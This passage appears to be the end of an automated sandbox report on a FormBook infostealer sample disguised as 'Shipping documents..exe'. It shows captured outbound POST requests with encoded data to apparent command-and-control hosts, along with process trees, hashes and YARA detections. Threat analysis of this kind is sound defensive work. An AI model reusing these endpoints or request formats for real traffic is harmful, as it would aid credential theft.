                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 43 62 75 6f 36 73 6e 6b 44 36 69 30 2f 64 79 50 74 47 54 70 66 4e 55 67 6b 6b 76 56 68 2f 64 37 62 4a 43 4e 4d 38 79 6f 79 6f 76 4f 46 6c 46 4e 46 64 30 48 4d 41 54 4f 66 79 50 67 7a 69 76 35 37 2f 54 76 36 4c 57 79 62 4a 74 72 4b 63 70 2b 61 50 47 7a 58 48 39 33 30 49 42 68 4b 71 69 47 7a 50 6c 32 63 52 33 41 47 4f 53 52 51 62 72 50 75 43 4d 69 2f 57 42 65 35 78 44 70 2b 41 49 2f 59 4e 73 37 6c 49 59 56 45 5a 5a 74 2b 54 4b 43 6b 48 72 33 73 69 72 2f 78 70 69 30 6a 56 58 36 6c 69 34 61 6e 44 43 56 70 4e 49 67 4e 33 34 5a 56 4d 37 77 51 39 49 7a 63 73 61 79 76 62 79 4a
                                                                                                        Data Ascii: DDp=FAcToKpjOSrSCbuo6snkD6i0/dyPtGTpfNUgkkvVh/d7bJCNM8yoyovOFlFNFd0HMATOfyPgziv57/Tv6LWybJtrKcp+aPGzXH930IBhKqiGzPl2cR3AGOSRQbrPuCMi/WBe5xDp+AI/YNs7lIYVEZZt+TKCkHr3sir/xpi0jVX6li4anDCVpNIgN34ZVM7wQ9IzcsayvbyJ
                                                                                                        Nov 6, 2024 08:42:44.565088987 CET | 846 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:44 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lB%2BN1uXOivaKzfKNUn104r4F4fgwJpWW3gdtvGHFAuph05SS7SUvjPONhStOE6MWDf4cAYta8t1ukeRPKgFy3J3dppkGsi00pKbHuPXwuc7NuFsuK0hxuLtVpkwAIz8v"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372d59cdc315f-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session ID: 50 | Source IP: 192.168.2.6 | Source Port: 50035 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 4156 | Process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:42:46.194065094 CET | 822 | OUT | POST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 4e 66 53 6f 34 4c 37 6b 46 61 69 72 77 39 79 50 6b 6d 54 79 66 4e 59 67 6b 67 33 46 69 4a 31 37 59 71 57 4e 4e 39 79 6f 31 6f 76 4f 4b 46 46 49 42 64 30 63 4d 41 65 74 66 77 62 67 7a 69 37 35 37 39 4c 76 36 34 2b 39 4a 70 74 70 43 38 70 38 45 2f 47 7a 58 48 39 33 30 4d 51 4b 4b 71 36 47 79 38 39 32 4f 43 76 44 4c 75 53 53 48 72 72 50 6b 53 4d 59 2f 57 42 5a 35 7a 33 44 2b 43 67 2f 59 4d 63 37 6c 61 67 53 4f 5a 59 48 68 44 4c 76 6f 43 65 42 68 44 47 4f 36 61 32 76 69 6c 66 53 70 30 6c 41 37 77 43 32 37 64 6f 69 4e 31 67 72 56 73 37 61 53 39 77 7a 4f 37 57 56 67 76 58 71 63 41 6c 6b 33 63 34 75 72 61 63 70 6e 59 57 48 62 38 6c 4c 63 51 3d 3d
                                                                                                        Data Ascii: DDp=FAcToKpjOSrSNfSo4L7kFairw9yPkmTyfNYgkg3FiJ17YqWNN9yo1ovOKFFIBd0cMAetfwbgzi7579Lv64+9JptpC8p8E/GzXH930MQKKq6Gy892OCvDLuSSHrrPkSMY/WBZ5z3D+Cg/YMc7lagSOZYHhDLvoCeBhDGO6a2vilfSp0lA7wC27doiN1grVs7aS9wzO7WVgvXqcAlk3c4uracpnYWHb8lLcQ==
                                                                                                        Nov 6, 2024 08:42:47.147092104 CET | 846 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:47 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HXpizlQy6sUmnjvUh58CprYt3ZfNDBQ0fpZohKKt4%2FQedrVdlkEn5RlcOsvpJVPFmOmDOr5Z7fphaVMplVUHwQAr82f4bK1it3RqyvNBZ7BC5GKoHAwdCgICSxhGI5J"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372e5b89de796-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session ID: 51 | Source IP: 192.168.2.6 | Source Port: 50036 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 4156 | Process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:42:48.732590914 CET | 1835 | OUT | POST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 4e 66 53 6f 34 4c 37 6b 46 61 69 72 77 39 79 50 6b 6d 54 79 66 4e 59 67 6b 67 33 46 69 4a 39 37 62 59 4f 4e 4d 66 61 6f 30 6f 76 4f 44 6c 46 4a 42 64 31 4d 4d 41 57 78 66 77 58 57 7a 67 44 35 36 63 72 76 38 4a 2b 39 43 70 74 70 4f 63 70 39 61 50 47 36 58 48 74 7a 30 49 30 4b 4b 71 36 47 79 36 35 32 4e 52 33 44 4a 75 53 52 51 62 72 44 75 43 4e 57 2f 51 70 76 35 7a 7a 35 2b 53 41 2f 57 4d 4d 37 6e 70 59 53 55 5a 5a 68 67 44 4c 33 6f 43 61 53 68 44 61 56 36 5a 71 56 69 69 76 53 72 53 46 5a 70 79 48 67 34 75 49 69 54 56 46 56 4d 59 79 71 56 75 67 4e 41 4e 61 66 6d 62 58 57 61 57 5a 54 31 50 35 4d 6b 4d 67 69 72 76 4f 58 56 5a 59 7a 49 76 4d 72 31 58 75 66 65 68 36 56 75 2f 49 33 4f 4f 63 6a 35 51 55 39 55 64 4c 4b 70 75 4c 6b 79 44 30 36 2f 59 59 50 49 53 75 46 32 46 78 33 79 65 4d 54 6b 6a 6c 43 73 56 34 32 4b 7a 48 4e 69 4e 76 54 38 64 59 7a 6b 76 62 76 2b 42 34 4e 2b 4c 4c 34 5a 78 46 61 6d 64 68 73 67 2f 57 2f 71 6c 77 55 71 42 78 6a 55 48 4f 71 65 56 [TRUNCATED]
                                                                                                        Data Ascii: DDp=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 [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:49.746179104 CET | 857 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:49 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2BIdzOhV%2BNsQyEDRu2YIGw2USrCs%2FYsV71Hm2Sf9sl2JdXgkN2kA7T1sR953SWFX56WEX%2F2uRvG8o%2FXACYvwWy6O8ylhbY39fEnxbIRUV7z7xV5TYEwk%2B3xnn35jo8dT"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372f5ddf82d35-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session ID: 52 | Source IP: 192.168.2.6 | Source Port: 50037 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 4156 | Process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:42:51.283243895 CET | 546 | OUT | GET /v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:42:52.286896944 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:42:52 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Vary: Origin
                                                                                                        set-cookie: locale=en-us; path=/; max-age=31557600; expires=Thu, 06 Nov 2025 13:42:52 GMT
                                                                                                        x-xss-protection: 1; mode=block
                                                                                                        x-content-type-options: nosniff
                                                                                                        x-download-options: noopen
                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntPc25kEmC1ajuXatwuxMIq6piB7pNnnQ65qnRVu8s%2BGHY2NrPrkq7aSPYtKLT1tQ93dfg%2Fu8SmpG9zppjvFcsygWpBA6OxSDM7SArddCEF%2BbMRzij2I9JzTX60x%2FSxj"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de37305bc04e9bd-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 38 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 7a 68 2d 43 4e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61
                                                                                                        Data Ascii: 18f6<!DOCTYPE html><html lang=zh-CN><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title></title><meta na
                                                                                                        Nov 6, 2024 08:42:52.286912918 CET | 1236 | IN | Data Raw: 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 2c 20 e5 8e 86 e5 8f b2 2c 20 e7 a9 bf e8 b6 8a 2c 20 e7 bd 91 e6 b8 b8 2c 20 e5 85 8d e8 b4 b9 e5 85 a8 e6 9c ac 2c 20 e9 9d 92 e6 98 a5
                                                                                                        Data Ascii: me=keywords content=", , , , , , , , , , , , , , ,
                                                                                                        Nov 6, 2024 08:42:52.286927938 CET | 424 | IN | Data Raw: 84 e6 ba 90 e5 85 8d e8 b4 b9 e4 b8 8b e8 bd bd 2c 20 e5 b0 8f e8 af b4 e4 b9 a6 e7 b1 8d e5 b9 b3 e5 8f b0 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 e5 bd ac e5 b1 95 e5 b0 8f e8 af b4
                                                                                                        Data Ascii: , "><meta name=description content=" -
                                                                                                        Nov 6, 2024 08:42:52.286940098 CET | 1236 | IN | Data Raw: e5 b0 8f e8 af b4 e7 83 ad e9 97 a8 e8 af 9d e9 a2 98 e5 b0 8f e8 af b4 e4 bd 9c e8 80 85 e4 b8 93 e6 a0 8f e5 b0 8f e8 af b4 e7 ab a0 e8 8a 82 e7 9b ae e5 bd 95 e5 b0 8f e8 af b4 e5 ae 8c e7 bb 93 e4 bd 9c e5 93 81 e5 b0 8f e8 af b4 e8 bf 9e e8
                                                                                                        Data Ascii:
                                                                                                        Nov 6, 2024 08:42:52.286948919 CET | 1236 | IN | Data Raw: 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 74 61 67 2f 22 2b 69 3b 0a 20 20 20 20 20 20 20 20 79 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 72 29 5b 30 5d 3b 79 2e 70 61 72 65 6e 74 4e 6f 64 65 2e
                                                                                                        Data Ascii: tps://www.clarity.ms/tag/"+i; y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "nvh240mhbp");</script></head><body><header class=container><div id=navbar><a href=/ class=brand
                                                                                                        Nov 6, 2024 08:42:52.286959887 CET | 1236 | IN | Data Raw: 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 69 74 65 6d 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 65 67 71 62 2e 74 6f 70 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 6c 69 6e 6b 3e e5 b0 94 e5 86 a0 e5 b0 8f e8 af b4 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                                                        Data Ascii: lass=domain-item><a href=https://egqb.top class=domain-link></a></li><li class=domain-item><a href=https://mgnxs.com class=domain-link></a></li><li class=domain-item><a href=https://aiqb.top class=domain-link>
                                                                                                        Nov 6, 2024 08:42:52.287024021 CET | 868 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 73 74 7a 71 62 2e 63 6f 6d 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 6c 69 6e 6b 3e e7 9b 9b e9 80 9a e5 b0 8f e8 af b4 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 69 74 65 6d 3e 3c 61 20
                                                                                                        Data Ascii: https://stzqb.com class=domain-link></a></li><li class=domain-item><a href=https://dhqb.info class=domain-link></a></li><li class=domain-item><a href=https://zeqb.info class=domain-link></a></li><li class=do


                                                                                                        Session ID: 53 | Source IP: 192.168.2.6 | Source Port: 50038 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4156 | Process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:42:58.038606882 CET | 828 | OUT | POST /azb9/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.econsultoria.online
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.econsultoria.online
                                                                                                        Referer: http://www.econsultoria.online/azb9/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 71 49 51 66 65 65 2f 51 68 46 57 48 39 5a 32 54 4f 51 56 76 55 6b 49 2b 38 34 38 5a 55 78 6b 6e 59 51 37 2f 34 50 6f 48 6d 63 4d 6e 58 4c 47 58 4e 41 63 54 58 74 4f 6d 30 37 51 76 51 67 70 47 6d 5a 4d 4b 51 49 34 35 37 31 79 6f 50 47 58 61 51 79 4d 39 34 41 4f 42 48 32 2f 79 45 54 34 56 62 4c 44 6d 42 6b 73 55 6f 7a 68 34 36 4c 50 6b 67 48 6d 31 45 30 30 64 79 50 38 73 41 72 6f 5a 50 44 56 61 69 52 61 4b 66 4f 77 50 2b 58 66 37 34 37 4a 35 4f 65 38 34 66 59 4c 6e 4e 7a 6f 70 56 41 66 63 50 6a 31 65 47 6d 7a 4d 6e 38 59 70 37 70 34 2b 4b 38 71 6e 6e 7a 61 35 75 51 6f 61 35 49 6b 38 74 79 46 52 62 4a 52 77
                                                                                                        Data Ascii: DDp=qIQfee/QhFWH9Z2TOQVvUkI+848ZUxknYQ7/4PoHmcMnXLGXNAcTXtOm07QvQgpGmZMKQI4571yoPGXaQyM94AOBH2/yET4VbLDmBksUozh46LPkgHm1E00dyP8sAroZPDVaiRaKfOwP+Xf747J5Oe84fYLnNzopVAfcPj1eGmzMn8Yp7p4+K8qnnza5uQoa5Ik8tyFRbJRw


                                                                                                        Session ID: 54 | Source IP: 192.168.2.6 | Source Port: 50039 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4156 | Process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:43:00.580977917 CET | 852 | OUT | POST /azb9/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.econsultoria.online
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.econsultoria.online
                                                                                                        Referer: http://www.econsultoria.online/azb9/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 71 49 51 66 65 65 2f 51 68 46 57 48 39 34 47 54 4a 7a 74 76 42 55 49 2f 35 34 38 5a 4e 68 6c 67 59 51 33 2f 34 4b 4e 66 6d 75 59 6e 55 71 32 58 4d 42 63 54 55 74 4f 6d 38 62 51 71 55 67 70 4e 6d 5a 42 35 51 4b 73 35 37 30 57 6f 50 43 48 61 51 44 4d 2b 35 51 4f 48 4d 57 2f 77 5a 6a 34 56 62 4c 44 6d 42 67 4d 36 6f 7a 35 34 36 61 2f 6b 68 69 4b 32 62 45 30 53 2f 66 38 73 45 72 6f 64 50 44 56 6f 69 51 32 7a 66 4b 41 50 2b 56 48 37 34 71 4a 2b 45 65 38 32 52 34 4b 33 4b 54 6c 32 58 6d 4f 6a 52 78 77 38 57 31 2f 4c 6d 4b 46 7a 6e 61 34 64 59 73 4b 6c 6e 78 43 4c 75 77 6f 77 37 49 63 38 2f 6c 4a 32 55 39 30 54 37 63 46 6e 53 66 6d 56 4c 74 4d 42 71 50 31 42 79 2f 63 39 59 41 3d 3d
                                                                                                        Data Ascii: DDp=qIQfee/QhFWH94GTJztvBUI/548ZNhlgYQ3/4KNfmuYnUq2XMBcTUtOm8bQqUgpNmZB5QKs570WoPCHaQDM+5QOHMW/wZj4VbLDmBgM6oz546a/khiK2bE0S/f8sErodPDVoiQ2zfKAP+VH74qJ+Ee82R4K3KTl2XmOjRxw8W1/LmKFzna4dYsKlnxCLuwow7Ic8/lJ2U90T7cFnSfmVLtMBqP1By/c9YA==



Target ID: 0
Start time: 02:38:54
Start date: 06/11/2024
Path: C:\Users\user\Desktop\Shipping documents..exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Shipping documents..exe"
Imagebase: 0x400000
File size: 1'322'107 bytes
MD5 hash: 3FBAB2B42254852FC8D71F14B2862A43
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 02:38:55
Start date: 06/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Shipping documents..exe"
Imagebase: 0x490000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:39:19
Start date: 06/11/2024
Path: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe"
Imagebase: 0x3c0000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 5
Start time: 02:39:21
Start date: 06/11/2024
Path: C:\Windows\SysWOW64\srdelayed.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SysWOW64\srdelayed.exe"
Imagebase: 0x620000
File size: 16'384 bytes
MD5 hash: B5F31FDCE1BE4171124B9749F9D2C600
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 02:39:21
Start date: 06/11/2024
Path: C:\Windows\SysWOW64\ktmutil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\ktmutil.exe"
Imagebase: 0x830000
File size: 15'360 bytes
MD5 hash: AC387D5962B2FE2BF4D518DD57BA7230
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 02:39:34
Start date: 06/11/2024
Path: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe"
Imagebase: 0x3c0000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 10
Start time: 02:39:47
Start date: 06/11/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff728280000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 3.4%
